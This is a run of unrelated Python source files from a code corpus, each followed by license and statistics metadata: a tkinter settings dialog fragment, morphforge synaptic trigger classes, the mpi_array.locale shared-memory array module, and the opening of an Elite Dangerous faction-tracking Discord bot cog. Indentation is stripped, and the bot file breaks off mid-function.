if self.ld:
if self.ld[0].lower() == 't':
self.ld = True
else:
self.ld = False
else:
self.ld = False
dbn = self.entry3.get()
if dbn:
self.dbn = dbn
self.ovrw = self.entry4.get()
if self.ovrw:
if self.ovrw[0].lower() == 't':
self.ovrw = True
else:
self.ovrw = False
else:
self.ovrw = False
th = self.entry5.get()
wl = self.entry6.get()
tslen = self.entry7.get()
if th:
try:
self.th = int(th)
except:
self.label_1 = tk.Label(self.master2,text="Please enter a number for the threshold.")
self.button1 = tk.Button(self.master2, text="continue", command=self.on_button)
self.master1.destroy()
self.label_1.pack()
self.button1.pack()
if wl:
try:
self.wl = int(wl)
except:
self.label_1 = tk.Label(self.master2,text="Please enter a number for the word length.")
self.button1 = tk.Button(self.master2, text="continue", command=self.on_button)
self.master1.destroy()
self.label_1.pack()
self.button1.pack()
if tslen:
try:
self.tslen = int(tslen)
except:
self.label_1 = tk.Label(self.master2,text="Please enter a number for the time series length.")
self.button1 = tk.Button(self.master2, text="continue", command=self.on_button)
self.master1.destroy()
self.label_1.pack()
self.button1.pack()
self.label_1 = tk.Label(self.master2,text="Is the following correct?\n\nLoad: "+str(self.ld)+'\n\nDatabase name: '+str(self.dbn)+'\n\nOverwrite: '+str(self.ovrw)+'\n\nCardinality: '+str(self.card)+'\n\nThreshold: '+str(self.th)+'\n\nWord length: '+str(self.wl)+'\n\nTime series length: '+str(self.tslen)+'\n\n',justify = 'left')
self.button1 = tk.Button(self.master2, text="yes", command=self.on_button2)
self.button2 = tk.Button(self.master2, text="no", command=self.on_button)
self.master1.destroy()
self.label_1.pack()
self.button1.pack(side='right')
self.button2.pack(side='right')
def on_button2(self):
self.master2.destroy()
main(load=self.ld, dbname=self.dbn, overwrite=self.ovrw, threshold = self.th, wordlength = self.wl, tslen = self.tslen, cardinality = self.card)
app = SampleApp()
app.mainloop()
| mit | -355,031,898,191,861,250 | 44.563158 | 340 | 0.547135 | false | 3.853963 | false | false | false |
mikehulluk/morphforge | src/morphforge/simulation/base/synaptictriggers/__init__.py | 1 | 2980 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# Copyright (c) 2012 Michael Hull.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------
from morphforge.simulation.base.networks import SynapticTrigger
from morphforge.simulation.base.networks import PreSynapticTypes
from morphforge.traces.eventset import EventSet
class SynapticTriggerByVoltageThreshold(SynapticTrigger):
def __init__(self, cell_location, voltage_threshold, delay, **kwargs):
super(SynapticTriggerByVoltageThreshold, self).__init__(**kwargs)
self.cell_location = cell_location
self.voltage_threshold = voltage_threshold
self.delay = delay
def get_presynaptic_cell_location(self):
return self.cell_location
def get_presynaptic_cell(self):
return self.cell_location.cell
def get_type(self):
return PreSynapticTypes.Cell
def get_summary_string(self):
return '%s: [threshold: %s]'%( self.cell_location.get_location_description_str(), self.voltage_threshold )
class SynapticTriggerAtTimes(SynapticTrigger):
def __init__(self, time_list, **kwargs):
super(SynapticTriggerAtTimes, self).__init__(**kwargs)
# Convert into an event set
if not isinstance(time_list, EventSet):
time_list = EventSet(time_list)
self.time_list = time_list
def get_presynaptic_cell(self):
return None
def get_type(self):
return PreSynapticTypes.FixedTiming
def get_summary_string(self):
return 'At times: %s (ms)'%( self.time_list.times_in_np_array_ms() )
| bsd-2-clause | -2,459,074,456,524,546,600 | 36.721519 | 114 | 0.692617 | false | 4.238976 | false | false | false |
mpi-array/mpi_array | mpi_array/locale.py | 1 | 30917 | """
==================================
The :mod:`mpi_array.locale` Module
==================================
Defines :obj:`LndarrayProxy` class and factory functions for
creating multi-dimensional arrays where memory is allocated
using :meth:`mpi4py.MPI.Win.Allocate_shared` or :meth:`mpi4py.MPI.Win.Allocate`.
Classes
=======
..
Special template for mpi_array.locale.LndarrayProxy to avoid numpydoc
documentation style sphinx warnings/errors from numpy.ndarray inheritance.
.. autosummary::
:toctree: generated/
:template: autosummary/inherits_ndarray_class.rst
lndarray - Sub-class of :obj:`numpy.ndarray` which uses MPI allocated memory buffer.
.. autosummary::
:toctree: generated/
:template: autosummary/class.rst
LndarrayProxy - Thin container for :obj:`lndarray` which provides convenience views.
PartitionViewSlices - Container for per-rank slices for created locale extent array views.
Factory Functions
=================
.. autosummary::
:toctree: generated/
empty - Create uninitialised array.
empty_like - Create uninitialised array same size/shape as another array.
zeros - Create zero-initialised array.
zeros_like - Create zero-initialised array same size/shape as another array.
ones - Create one-initialised array.
ones_like - Create one-initialised array same size/shape as another array.
copy - Create a replica of a specified array.
Utilities
=========
.. autosummary::
:toctree: generated/
NdarrayMetaData - Strides, offset and order info.
"""
from __future__ import absolute_import
import sys as _sys
import numpy as _np
import mpi4py.MPI as _mpi
import array_split as _array_split
from array_split.split import convert_halo_to_array_form as _convert_halo_to_array_form
import collections as _collections
from .license import license as _license, copyright as _copyright, version as _version
from .comms import create_distribution, get_win_memory
from .distribution import LocaleExtent as _LocaleExtent
from .distribution import HaloSubExtent as _HaloSubExtent
from .distribution import IndexingExtent as _IndexingExtent
from .utils import log_shared_memory_alloc as _log_shared_memory_alloc
from .utils import log_memory_alloc as _log_memory_alloc
from . import logging as _logging
__author__ = "Shane J. Latham"
__license__ = _license()
__copyright__ = _copyright()
__version__ = _version()
class NdarrayMetaData(object):
"""
Encapsulates, strides, offset and order argument of :meth:`LndarrayProxy.__new__`.
"""
def __init__(self, offset, strides, order):
"""
Construct.
:type offset: :samp:`None` or :obj:`int`
:param offset: Offset of array data in buffer.
:type strides: :samp:`None` or sequence of :obj:`int`
:param strides: Strides of data in memory.
:type order: {:samp:`C`, :samp:`F`} or :samp:`None`
:param order: Row-major (C-style) or column-major (Fortran-style) order.
"""
object.__init__(self)
self._strides = strides
self._offset = offset
self._order = order
@property
def order(self):
return self._order
class win_lndarray(_np.ndarray):
"""
Sub-class of :obj:`numpy.ndarray` which allocates buffer using
MPI window allocated memory.
"""
def __new__(
cls,
shape,
dtype=_np.dtype("float64"),
buffer=None,
offset=0,
strides=None,
order=None,
comm=None,
root_rank=0
):
"""
Construct. Allocates shared-memory (:func:`mpi4py.MPI.Win.Allocated_shared`)
buffer when :samp:`{comm}.size > 1`. Uses :func:`mpi4py.MPI.Win.Allocate`
to allocate buffer when :samp:`{comm}.size == 1`.
:type shape: :samp:`None` or sequence of :obj:`int`
:param shape: **Local** shape of the array, this parameter is ignored.
:type dtype: :obj:`numpy.dtype`
:param dtype: Data type for elements of the array.
:type buffer: :obj:`buffer`
:param buffer: The sequence of bytes providing array element storage.
Raises :obj:`ValueError` if :samp:`{buffer} is None`.
:type offset: :samp:`None` or :obj:`int`
:param offset: Offset of array data in buffer, i.e where array begins in buffer
(in buffer bytes).
:type strides: :samp:`None` or sequence of :obj:`int`
:param strides: Strides of data in memory.
:type order: {:samp:`C`, :samp:`F`} or :samp:`None`
:param order: Row-major (C-style) or column-major (Fortran-style) order.
:type comm: :obj:`mpi4py.Comm`
:param comm: Communicator used for allocating MPI window memory.
:type root_rank: :obj:`int`
:param root_rank: Rank of root process which allocates the shared memory.
"""
dtype = _np.dtype(dtype)
if comm is None:
raise ValueError("Got comm is None, require comm to be a valid mpi4py.MPI.Comm object")
if comm is _mpi.COMM_NULL:
raise ValueError(
"Got comm is COMM_NULL, require comm to be a valid mpi4py.MPI.Comm object"
)
if buffer is None:
num_rank_bytes = 0
rank_shape = shape
if comm.rank == root_rank:
num_rank_bytes = int(_np.product(rank_shape) * dtype.itemsize)
else:
rank_shape = tuple(_np.zeros_like(rank_shape))
logger = _logging.get_rank_logger(__name__ + "." + cls.__name__)
if (_mpi.VERSION >= 3) and (comm.size > 1):
_log_shared_memory_alloc(
logger.debug, "BEG: ", num_rank_bytes, rank_shape, dtype
)
win = \
_mpi.Win.Allocate_shared(
num_rank_bytes,
dtype.itemsize,
comm=comm
)
_log_shared_memory_alloc(
logger.debug, "END: ", num_rank_bytes, rank_shape, dtype
)
buf_isize_pair = win.Shared_query(0)
buffer = buf_isize_pair[0]
else:
_log_memory_alloc(
logger.debug, "BEG: ", num_rank_bytes, rank_shape, dtype
)
win = _mpi.Win.Allocate(num_rank_bytes, dtype.itemsize, comm=comm)
_log_memory_alloc(
logger.debug, "END: ", num_rank_bytes, rank_shape, dtype
)
buffer = get_win_memory(win)
buffer = _np.array(buffer, dtype='B', copy=False)
self = \
_np.ndarray.__new__(
cls,
shape,
dtype,
buffer,
offset,
strides,
order
)
self._comm = comm
self._win = win
return self
def __array_finalize__(self, obj):
"""
Sets :attr:`md` attribute for :samp:`{self}`
from :samp:`{obj}` if required.
:type obj: :obj:`object` or :samp:`None`
:param obj: Object from which attributes are set.
"""
if obj is None:
return
self._comm = getattr(obj, '_comm', None)
self._win = getattr(obj, '_win', None)
@property
def comm(self):
"""
The :obj:`mpi4py.MPI.Comm` communicator which was collectively used to allocate
the buffer (memory) for this array.
"""
return self._comm
@property
def win(self):
"""
The :obj:`mpi4py.MPI.Win` window which was created when allocating
the buffer (memory) for this array.
"""
return self._win
def free(self):
"""
Collective (over all processes in :attr:`comm`) free the MPI window
and associated memory buffer.
"""
self.shape = tuple(_np.zeros_like(self.shape))
if self._win is not None:
self._win.Free()
def __enter__(self):
"""
For use with :samp:`with` contexts.
"""
return self
def __exit__(self, type, value, traceback):
"""
For use with :samp:`with` contexts.
"""
self.free()
return False
class lndarray(_np.ndarray):
"""
Sub-class of :obj:`numpy.ndarray` which requires :samp:`{buffer}` to
be specified for instantiation.
"""
def __new__(
cls,
shape=None,
dtype=_np.dtype("float64"),
buffer=None,
offset=0,
strides=None,
order=None
):
"""
Construct, at least one of :samp:{shape} or :samp:`decomp` should
be specified (i.e. at least one should not be :samp:`None`).
:type shape: :samp:`None` or sequence of :obj:`int`
:param shape: **Local** shape of the array, this parameter is ignored.
:type dtype: :obj:`numpy.dtype`
:param dtype: Data type for elements of the array.
:type buffer: :obj:`buffer`
:param buffer: The sequence of bytes providing array element storage.
Raises :obj:`ValueError` if :samp:`{buffer} is None`.
:type offset: :samp:`None` or :obj:`int`
:param offset: Offset of array data in buffer, i.e where array begins in buffer
(in buffer bytes).
:type strides: :samp:`None` or sequence of :obj:`int`
:param strides: Strides of data in memory.
:type order: {:samp:`C`, :samp:`F`} or :samp:`None`
:param order: Row-major (C-style) or column-major (Fortran-style) order.
"""
if buffer is None:
raise ValueError("Got buffer=None, require buffer allocated from LocaleComms.")
self = \
_np.ndarray.__new__(
cls,
shape,
dtype,
buffer,
offset,
strides,
order
)
self._md = NdarrayMetaData(offset=offset, strides=strides, order=order)
return self
def __array_finalize__(self, obj):
"""
Sets :attr:`md` attribute for :samp:`{self}`
from :samp:`{obj}` if required.
:type obj: :obj:`object` or :samp:`None`
:param obj: Object from which attributes are set.
"""
if obj is None:
return
self._md = getattr(obj, '_md', None)
@property
def md(self):
"""
Meta-data object of type :obj:`NdarrayMetaData`.
"""
return self._md
def free(self):
"""
Release reference to buffer, and zero-ise :samp:`self.shape`.
"""
pass
PartitionViewSlices = \
_collections.namedtuple(
"PartitionViewSlices",
[
"rank_view_slice_n",
"rank_view_slice_h",
"rank_view_relative_slice_n",
"rank_view_partition_slice_h",
"lndarray_view_slice_n"
]
)
if (_sys.version_info[0] >= 3) and (_sys.version_info[1] >= 5):
PartitionViewSlices.__doc__ =\
"""
Stores multiple :obj:`tuple`-of-:obj:`slice` objects indicating
the slice (tile) of the :obj:`lndarray` on which a :samp:`intra_locale_comm`
rank MPI process operates.
"""
PartitionViewSlices.rank_view_slice_n.__doc__ =\
"""
Slice indicating tile of the non-halo array.
"""
PartitionViewSlices.rank_view_slice_h.__doc__ =\
"""
The slice :attr:`rank_view_slice_n` with halo added.
"""
PartitionViewSlices.rank_view_relative_slice_n.__doc__ =\
"""
*Relative* slice which can be used to remove the
halo elements from a view generated using :attr:`rank_view_slice_h`.
"""
PartitionViewSlices.rank_view_partition_slice_h.__doc__ =\
"""
Slice indicating tile of the halo array.
"""
PartitionViewSlices.lndarray_view_slice_n.__doc__ =\
"""
Slice for generating a view of a :obj:`lndarray` with
the halo removed.
"""
#: Cache for locale array partitioning
_intra_partition_cache = _collections.defaultdict(lambda: None)
class LndarrayProxy(object):
"""
Proxy for :obj:`lndarray` instances. Provides :samp:`peer_rank`
views of the array for parallelism.
"""
#: The "low index" indices.
LO = _LocaleExtent.LO
#: The "high index" indices.
HI = _LocaleExtent.HI
def __new__(
cls,
shape=None,
dtype=_np.dtype("float64"),
buffer=None,
offset=0,
strides=None,
order=None,
intra_locale_rank=None,
intra_locale_size=0,
intra_partition_dims=None,
locale_extent=None,
halo=None,
comms_and_distrib=None,
rma_window_buffer=None
):
"""
Initialise, at least one of :samp:{shape} or :samp:`locale_extent` should
be specified (i.e. at least one should not be :samp:`None`).
:type shape: :samp:`None` or sequence of :obj:`int`
:param shape: Shape of the array apportioned to this locale. If :samp:`None`
shape is taken as :samp:`{locale_extent}.shape_h`.
:type dtype: :obj:`numpy.dtype`
:param dtype: Data type for elements of the array.
:type buffer: :obj:`memoryview`
:param buffer: The sequence of bytes providing array element storage.
Must be specified (not :samp:`None`).
:type offset: :samp:`None` or :obj:`int`
:param offset: Offset of array data in buffer, i.e where array begins in buffer
(in buffer bytes).
:type strides: :samp:`None` or sequence of :obj:`int`
:param strides: Strides of data in memory.
:type order: {:samp:`C`, :samp:`F`} or :samp:`None`
:param order: Row-major (C-style) or column-major (Fortran-style) order.
:type locale_extent: :obj:`mpi_array.distribution.LocaleExtent`
:param locale_extent: The array extent to be allocated on this locale.
"""
self = object.__new__(cls)
# initialise these members before potential exceptions
# because they are referenced in self.free (via self.__del__).
self._lndarray = None
self.rma_window_buffer = None
if locale_extent is None or (not isinstance(locale_extent, _LocaleExtent)):
raise ValueError(
"Got locale_extent=%s, expecting instance of type %s"
%
(locale_extent, _LocaleExtent)
)
if (shape is not None) and (not _np.all(locale_extent.shape_h == shape)):
raise ValueError(
"Got conflicting locale shape: shape=%s, locale_extent.shape_n=%s"
%
(shape, locale_extent.shape_h)
)
self._lndarray = \
lndarray(
shape=locale_extent.shape_h,
dtype=dtype,
buffer=buffer,
offset=offset,
strides=strides,
order=order
)
self._intra_locale_rank = intra_locale_rank
self._intra_locale_size = intra_locale_size
self._intra_partition_dims = intra_partition_dims
self._locale_extent = locale_extent
self._halo = _convert_halo_to_array_form(halo, self._locale_extent.ndim)
self._intra_partition_dims = _np.zeros_like(locale_extent.shape_h)
self._intra_partition_dims, self._intra_partition = \
self.calculate_intra_partition(
intra_locale_size=self._intra_locale_size,
intra_locale_dims=self._intra_partition_dims,
intra_locale_rank=self._intra_locale_rank,
extent=self._locale_extent,
halo=self._halo
)
self.comms_and_distrib = comms_and_distrib
self.rma_window_buffer = rma_window_buffer
return self
def free(self):
"""
Release locale array memory and assign :samp:`None` to self attributes.
"""
if self._lndarray is not None:
self._lndarray.free()
self._lndarray = None
self._intra_locale_rank = None
self._intra_locale_size = None
self._intra_partition_dims = None
self._locale_extent = None
self._halo = None
self._intra_partition_dims = None
self._intra_partition = None
self.comms_and_distrib = None
if self.rma_window_buffer is not None:
self.rma_window_buffer.free()
self.rma_window_buffer = None
def __del__(self):
"""
Calls :meth:`free`.
"""
self.free()
def __enter__(self):
"""
For use with :samp:`with` contexts.
"""
return self
def __exit__(self, type, value, traceback):
"""
For use with :samp:`with` contexts.
"""
self.free()
return False
def calculate_intra_partition(
self,
intra_locale_size,
intra_locale_dims,
intra_locale_rank,
extent,
halo
):
"""
Splits :samp:`{extent}` into :samp:`self.intra_locale_size` number
of tiles.
"""
global _intra_partition_cache
key = \
(
intra_locale_size,
tuple(intra_locale_dims),
intra_locale_rank,
extent.to_tuple(),
tuple(tuple(row) for row in halo.tolist())
)
partition_pair = _intra_partition_cache[key]
if partition_pair is None:
ndim = extent.ndim
rank_view_slice_n = tuple()
rank_view_slice_h = rank_view_slice_n
rank_view_relative_slice_n = rank_view_slice_n
rank_view_partition_h = rank_view_slice_n
lndarray_view_slice_n = rank_view_slice_n
if ndim > 0:
intra_locale_dims = \
_array_split.split.calculate_num_slices_per_axis(
intra_locale_dims,
intra_locale_size
)
if extent.size_n > 0:
shape_splitter = \
_array_split.ShapeSplitter(
array_shape=extent.shape_n,
axis=intra_locale_dims,
halo=0,
array_start=extent.start_n
)
split = shape_splitter.calculate_split()
rank_extent = \
_HaloSubExtent(
globale_extent=extent,
slice=split.flatten()[intra_locale_rank],
halo=halo
)
# Convert rank_extent_n and rank_extent_h from global-indices
# to local-indices
rank_extent = extent.globale_to_locale_extent_h(rank_extent)
rank_h_relative_extent_n = \
_IndexingExtent(
start=rank_extent.start_n - rank_extent.start_h,
stop=rank_extent.start_n - rank_extent.start_h + rank_extent.shape_n,
)
rank_view_slice_n = rank_extent.to_slice_n()
rank_view_slice_h = rank_extent.to_slice_h()
rank_view_relative_slice_n = rank_h_relative_extent_n.to_slice()
rank_view_partition_h = rank_view_slice_n
if _np.any(extent.halo > 0):
shape_splitter = \
_array_split.ShapeSplitter(
array_shape=extent.shape_h,
axis=intra_locale_dims,
halo=0,
)
split = shape_splitter.calculate_split()
rank_view_partition_h = split.flatten()[intra_locale_rank]
lndarray_view_slice_n = extent.globale_to_locale_extent_h(extent).to_slice_n()
partition_pair = \
(
intra_locale_dims,
PartitionViewSlices(
rank_view_slice_n,
rank_view_slice_h,
rank_view_relative_slice_n,
rank_view_partition_h,
lndarray_view_slice_n
)
)
_intra_partition_cache[key] = partition_pair
return partition_pair
def __getitem__(self, *args, **kwargs):
"""
Return slice/item from :attr:`lndarray` array.
"""
return self._lndarray.__getitem__(*args, **kwargs)
def __setitem__(self, *args, **kwargs):
"""
Set slice/item in :attr:`lndarray` array.
"""
self._lndarray.__setitem__(*args, **kwargs)
def __eq__(self, other):
"""
"""
if isinstance(other, LndarrayProxy):
return self._lndarray == other._lndarray
else:
return self._lndarray == other
@property
def lndarray(self):
"""
An :obj:`lndarray` instance containing array data in (potentially)
shared memory.
"""
return self._lndarray
@property
def intra_partition(self):
"""
A :obj:`PartitionViewSlices` containing slices for this rank (of :samp:`peer_comm`).
"""
return self._intra_partition
@property
def intra_partition_dims(self):
"""
A sequence of integers indicating the number of partitions
along each axis which determines the per-rank views of the locale extent array.
"""
return self._intra_partition_dims
@property
def locale_extent(self):
"""
A :obj:`LocaleExtent` describing the portion of the array assigned to this locale.
"""
return self._locale_extent
@property
def halo(self):
"""
The number of ghost cells for intra locale partitioning of the extent.
This is an upper bound on the per-rank partitions, with the halo possibly
trimmed by the halo extent (due to being on globale boundary).
"""
return self._halo
@property
def md(self):
"""
Meta-data object of type :obj:`NdarrayMetaData`.
"""
return self._lndarray.md
@property
def dtype(self):
"""
A :obj:`numpy.dtype` object describing the element type of this array.
"""
return self._lndarray.dtype
@property
def shape(self):
"""
The shape of the locale array (including halo), i.e. :samp:`self.lndarray.shape`.
"""
return self._lndarray.shape
@property
def rank_view_n(self):
"""
A tile view of the array for this rank of :samp:`peer_comm`.
"""
return self._lndarray[self._intra_partition.rank_view_slice_n]
@property
def rank_view_h(self):
"""
A tile view (including halo elements) of the array for this rank of :samp:`peer_comm`.
"""
return self._lndarray[self._intra_partition.rank_view_slice_h]
@property
def rank_view_slice_n(self):
"""
Sequence of :obj:`slice` objects used to generate :attr:`rank_view_n`.
"""
return self._intra_partition.rank_view_slice_n
@property
def rank_view_slice_h(self):
"""
Sequence of :obj:`slice` objects used to generate :attr:`rank_view_h`.
"""
return self._intra_partition.rank_view_slice_h
@property
def rank_view_partition_h(self):
"""
Rank tile view from the paritioning of entire :samp:`self._lndarray`
(i.e. partition of halo array). Same as :samp:`self.rank_view_n` when
halo is zero.
"""
return self._lndarray[self._intra_partition.rank_view_partition_slice_h]
@property
def view_n(self):
"""
View of entire array without halo.
"""
return self._lndarray[self._intra_partition.lndarray_view_slice_n]
@property
def view_h(self):
"""
The entire :obj:`LndarrayProxy` view including halo (i.e. :samp:{self}).
"""
return self._lndarray.view()
def fill(self, value):
"""
Fill the array with a scalar value (excludes ghost elements).
:type value: scalar
:param value: All non-ghost elements are assigned this value.
"""
self._lndarray[self._intra_partition.rank_view_slice_n].fill(value)
def fill_h(self, value):
"""
Fill the array with a scalar value (including ghost elements).
:type value: scalar
:param value: All elements (including ghost elements) are assigned this value.
"""
self._lndarray[self._intra_partition.rank_view_partition_slice_h].fill(value)
def empty(
shape=None,
dtype="float64",
comms_and_distrib=None,
order='C',
return_rma_window_buffer=False,
intra_partition_dims=None,
**kwargs
):
"""
Creates array of uninitialised elements.
:type shape: :samp:`None` or sequence of :obj:`int`
:param shape: **Global** shape to be distributed amongst
memory nodes.
:type dtype: :obj:`numpy.dtype`
:param dtype: Data type of array elements.
:type comms_and_distrib: :obj:`numpy.dtype`
:param comms_and_distrib: Data type of array elements.
:rtype: :obj:`LndarrayProxy`
:return: Newly created array with uninitialised elements.
"""
if comms_and_distrib is None:
comms_and_distrib = create_distribution(shape=shape, **kwargs)
intra_locale_rank = comms_and_distrib.locale_comms.intra_locale_comm.rank
intra_locale_size = comms_and_distrib.locale_comms.intra_locale_comm.size
locale_extent = \
comms_and_distrib.distribution.get_extent_for_rank(
inter_locale_rank=comms_and_distrib.this_locale.inter_locale_rank
)
rma_window_buffer = \
comms_and_distrib.locale_comms.alloc_locale_buffer(
shape=locale_extent.shape_h,
dtype=dtype
)
kwargs = dict()
if not return_rma_window_buffer:
kwargs = {
"comms_and_distrib": comms_and_distrib,
"rma_window_buffer": rma_window_buffer,
}
ret = \
LndarrayProxy(
shape=rma_window_buffer.shape,
buffer=rma_window_buffer.buffer,
dtype=dtype,
order=order,
intra_locale_rank=intra_locale_rank,
intra_locale_size=intra_locale_size,
intra_partition_dims=intra_partition_dims,
locale_extent=locale_extent,
halo=comms_and_distrib.distribution.halo,
**kwargs
)
if return_rma_window_buffer:
ret = ret, rma_window_buffer
return ret
def empty_like(ary, dtype=None):
"""
Return a new array with the same shape and type as a given array.
:type ary: :obj:`numpy.ndarray`
:param ary: Copy attributes from this array.
:type dtype: :obj:`numpy.dtype`
:param dtype: Specifies different dtype for the returned array.
:rtype: :samp:`type(ary)`
:return: Array of uninitialized (arbitrary) data with the same shape and type as :samp:`{a}`.
"""
if dtype is None:
dtype = ary.dtype
if (isinstance(ary, LndarrayProxy)):
ret_ary = \
empty(
dtype=ary.dtype,
comms_and_distrib=ary.comms_and_distrib,
order=ary.md.order,
intra_partition_dims=ary.intra_partition_dims
)
else:
ret_ary = _np.empty_like(ary, dtype=dtype)
return ret_ary
def zeros(shape=None, dtype="float64", comms_and_distrib=None, order='C', **kwargs):
"""
Creates array of zero-initialised elements.
:type shape: :samp:`None` or sequence of :obj:`int`
:param shape: **Global** shape to be distributed amongst
memory nodes.
:type dtype: :obj:`numpy.dtype`
:param dtype: Data type of array elements.
:type comms_and_distrib: :obj:`numpy.dtype`
:param comms_and_distrib: Data type of array elements.
:rtype: :obj:`LndarrayProxy`
:return: Newly created array with zero-initialised elements.
"""
ary = empty(shape, dtype=dtype, comms_and_distrib=comms_and_distrib, order=order, **kwargs)
ary.fill_h(ary.dtype.type(0))
return ary
def zeros_like(ary, *args, **kwargs):
"""
Return a new zero-initialised array with the same shape and type as a given array.
:type ary: :obj:`LndarrayProxy`
:param ary: Copy attributes from this array.
:type dtype: :obj:`numpy.dtype`
:param dtype: Specifies different dtype for the returned array.
:rtype: :obj:`LndarrayProxy`
:return: Array of zero-initialized data with the same shape and type as :samp:`{ary}`.
"""
ary = empty_like(ary, *args, **kwargs)
ary.fill_h(ary.dtype.type(0))
return ary
def ones(shape=None, dtype="float64", comms_and_distrib=None, order='C', **kwargs):
"""
Creates array of one-initialised elements.
:type shape: :samp:`None` or sequence of :obj:`int`
:param shape: **Global** shape to be distributed amongst
memory nodes.
:type dtype: :obj:`numpy.dtype`
:param dtype: Data type of array elements.
:type comms_and_distrib: :obj:`numpy.dtype`
:param comms_and_distrib: Data type of array elements.
:rtype: :obj:`LndarrayProxy`
:return: Newly created array with one-initialised elements.
"""
ary = empty(shape, dtype=dtype, comms_and_distrib=comms_and_distrib, order=order, **kwargs)
ary.fill_h(ary.dtype.type(1))
return ary
def ones_like(ary, *args, **kwargs):
"""
Return a new one-initialised array with the same shape and type as a given array.
:type ary: :obj:`LndarrayProxy`
:param ary: Copy attributes from this array.
:type dtype: :obj:`numpy.dtype`
:param dtype: Specifies different dtype for the returned array.
:rtype: :obj:`LndarrayProxy`
:return: Array of one-initialized data with the same shape and type as :samp:`{ary}`.
"""
ary = empty_like(ary, *args, **kwargs)
ary.fill_h(ary.dtype.type(1))
return ary
def copy(ary):
"""
Return an array copy of the given object.
:type ary: :obj:`LndarrayProxy`
:param ary: Array to copy.
:rtype: :obj:`LndarrayProxy`
:return: A copy of :samp:`ary`.
"""
ary_out = empty_like(ary)
ary_out.rank_view_n[...] = ary.rank_view_n[...]
return ary_out
__all__ = [s for s in dir() if not s.startswith('_')]
| mit | -2,072,150,402,537,923,600 | 31.78579 | 99 | 0.564608 | false | 3.942489 | false | false | false |
nisanick/Prisma_Machina | cogs/bgs.py | 1 | 29859 | from datetime import datetime
import discord
from discord.ext import commands
import asyncio
import checks
import database
from dateutil.parser import isoparse
from config import BGS_CHANNEL
from data.faction import Faction
from web import Web
class BGS(commands.Cog):
def __init__(self, bot: commands.Bot):
self.bot = bot
self.system_cache = {}
self.faction_cache = {}
self.updated_systems = set()
self.last_tick = None
self.tick_id = 0
self.faction_data = {
75253: Faction(75253, "Colonists of Aurora", "https://inara.cz/minorfaction/44432/"),
23831: Faction(23831, "Prismatic Imperium", "https://inara.cz/minorfaction/25441/"),
74847: Faction(74847, "Adamantine Union", "https://inara.cz/minorfaction/35809/")
}
self.war_cache = {}
# @commands.command(name='fullscan', case_insensitive=True, hidden=True)
# @commands.check(checks.can_manage_bot)
async def _full_scan(self, ctx, *, faction_name):
async with ctx.typing():
await self._fullscan_faction(faction_name, 1)
await ctx.send("done")
async def _fullscan_faction(self, faction_name, page):
args = {
'factionname': faction_name,
'page': page
}
data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/populatedsystems', args, 'object')
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
tick_select = "SELECT id as tick_id, time FROM tick ORDER BY time DESC LIMIT 1"
self.tick_id = (await db.fetchrow(tick_select))['tick_id']
for system in data.docs:
if str(system.id) not in self.system_cache:
self.system_cache[str(system.id)] = system.name
insert_system = "INSERT INTO star_system VALUES ($1, $2, $3, $4 , $5, $6, $7, $8, $9, $10, $11, $12, $13, $14, $15) ON CONFLICT DO NOTHING "
if str(system.controlling_minor_faction_id) in self.faction_cache:
controling_faction_name = self.faction_cache[str(system.controlling_minor_faction_id)]
else:
controling_faction_data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/factions', {'eddbid': system.controlling_minor_faction_id}, 'object')
controling_faction_name = controling_faction_data.docs[0].name
self.faction_cache[str(system.controlling_minor_faction_id)] = controling_faction_name
our_faction = 0
for faction in system.minor_faction_presences:
if faction.minor_faction_id in self.faction_data:
our_faction = faction.minor_faction_id
system_values = (
system.id,
system.name,
system.x,
system.y,
system.z,
controling_faction_name,
system.needs_permit,
system.power,
system.power_state,
system.reserve_type,
system.primary_economy,
system.security,
system.population,
system.edsm_id,
our_faction
)
await db.execute(insert_system, *system_values)
for faction in system.minor_faction_presences:
await self._process_faction_data(faction.minor_faction_id)
states = ""
pending = ""
recovering = ""
for state in faction.active_states:
if len(states) > 0:
states = states + '|'
states = states + state.name
for state in faction.pending_states:
if len(pending) > 0:
pending = pending + '|'
pending = pending + state.name
for state in faction.recovering_states:
if len(recovering) > 0:
recovering = recovering + '|'
recovering = recovering + state.name
async with db.transaction():
insert_influence = "INSERT INTO influence(faction, system, influence, tick, states, pending, recovering) VALUES($1, $2, $3, $4, $5, $6, $7) ON CONFLICT DO NOTHING"
influence_values = (
faction.minor_faction_id,
system.id,
faction.influence,
self.tick_id,
states,
pending,
recovering
)
await db.execute(insert_influence, *influence_values)
await database.Database.close_connection(db)
if int(data.page) < int(data.pages):
await self._fullscan_faction(faction_name, page + 1)
async def _process_faction_data(self, faction_id):
args = {
'eddbid': faction_id
}
data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/factions', args, 'object')
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
for faction in data.docs:
if str(faction_id) not in self.faction_cache:
self.faction_cache[str(faction.id)] = faction.name
